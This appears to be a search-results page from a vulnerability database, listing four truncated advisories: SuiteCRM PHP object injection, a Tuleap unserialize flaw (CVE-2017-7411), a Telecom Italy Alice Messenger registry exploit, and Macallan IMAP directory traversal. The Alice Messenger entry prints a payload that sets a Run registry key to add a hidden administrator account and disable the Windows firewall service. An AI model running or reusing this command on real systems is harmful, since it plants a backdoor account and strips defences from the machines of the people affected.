4 matches found
SuiteCRM 7.11.11 Second-Order PHP Object Injection
SuiteCRM <= 7.11.11 Second-Order PHP Object Injection Vulnerabilities - Software Link: https://suitecrm.com/ - Affected Versions: Version 7.11.11 and prior...
CVE-2017-7411
An issue was discovered in Enalean Tuleap 9.6 and prior versions. The vulnerability exists because the User::getRecentElements method is using the unserialize function with a preference value that can be arbitrarily manipulated by malicious users through the REST API interface, and this can be...
Telecom Italy Alice Messenger - Remote Registry Key Manipulation
group="HKEYLOCALMACHINE" section="SOFTWARE\Microsoft\Windows\CurrentVersion\Run" key="sun-tzu" valType=1 'REGSZ value="""c:\windows\system32\cmd.exe"" /c net user sun tzu /add & net localgroup Administrators sun /add & sc config SharedAccess start= disabled & net stop SharedAccess & sc config...
Macallan IMAP Server Multiple Traversals Arbitrary File/Directory Manipulation
The remote host is running Macallan Mail Solution, a mail server for Windows. The IMAP server bundled with the version of Macallan installed on the remote host fails to filter directory traversal sequences from mailbox names passed to the 'CREATE', 'DELETE', 'RENAME', and 'SELECT' commands. An...